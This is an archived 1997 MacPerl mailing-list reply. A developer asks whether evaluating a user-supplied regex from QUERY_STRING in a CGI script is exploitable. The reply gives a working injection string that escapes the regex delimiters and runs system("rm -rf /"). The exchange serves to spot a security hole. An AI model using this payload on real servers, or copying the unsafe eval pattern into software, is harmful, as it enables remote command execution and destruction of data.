[Date Prev][Date Next][Thread Prev][Thread Next] [Search] [Date Index] [Thread Index]

Re: [MacPerl] CGI question

To: Aperghis-Tramoni Sebastian <madingue@cis.uni-muenchen.de>
Subject: Re: [MacPerl] CGI question
From: David McWherter <dtm@water.waterw.com>
Date: Mon, 18 Aug 1997 12:48:04 -0400 (EDT)
cc: mac-perl@iis.ee.ethz.ch
In-Reply-To: <199708181247.OAA00571@roadrunner.cis.uni-muenchen.de>

I found one:

$regexp="any_string#; system(\"rm -rf /\"); m#any_string";
eval " \$found = m#$regexp# ";

That will execute the system command without any problem under
perl5.004 on a UNIX box.  

-David

On Mon, 18 Aug 1997, Aperghis-Tramoni Sebastian wrote:

> 
> I have written a CGI which works (for now! :-) ) but I'd want to add a  
> feature which uses Perl regexp. So my question is: does anyone can use the  
> following code in order to do forbidden things ?
> 
>     eval " \$found = m#$regexp# "
> 
> where the $regexp variable directly comes from $ENV{'QUERY_STRING'}.
> 
> I would really like to know that because for now, I can't find any hole, and  
> I don't want to use something which could be dangerous in my CGI..
> 
> Thanks in advance.
> 
> ***** Want to unsubscribe from this list?
> ***** Send mail with body "unsubscribe" to mac-perl-request@iis.ee.ethz.ch
> 


***** Want to unsubscribe from this list?
***** Send mail with body "unsubscribe" to mac-perl-request@iis.ee.ethz.ch

References:
- [MacPerl] CGI question
  - From: Aperghis-Tramoni Sebastian <madingue@cis.uni-muenchen.de>

Prev by Date: Re: [MacPerl] OSA Extention for PERL
Next by Date: [MacPerl] Mac BBEDIT Extentions
Prev by thread: [MacPerl] CGI question
Next by thread: Re: [MacPerl] Secret library path
Navigation: Date Index | Thread Index | Search | Other lists at bumppo.net